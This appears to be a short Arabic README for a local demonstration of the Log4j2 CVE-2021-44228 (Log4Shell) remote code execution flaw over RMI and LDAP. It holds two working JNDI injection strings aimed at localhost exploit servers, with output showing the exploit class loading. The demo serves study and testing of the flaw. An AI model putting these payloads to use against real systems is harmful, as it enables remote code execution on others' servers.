
عرض توضيحي لـ Apache Log4j2 CVE-2021-44228 RCE باستخدام RMI و LDAP
مثال على استغلال CVE-2021-44228 لحقن الكود عن بُعد عبر كل من RMI و LDAP.

Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
تشغيل RmiServer و LdapServer يعتمد على Python3.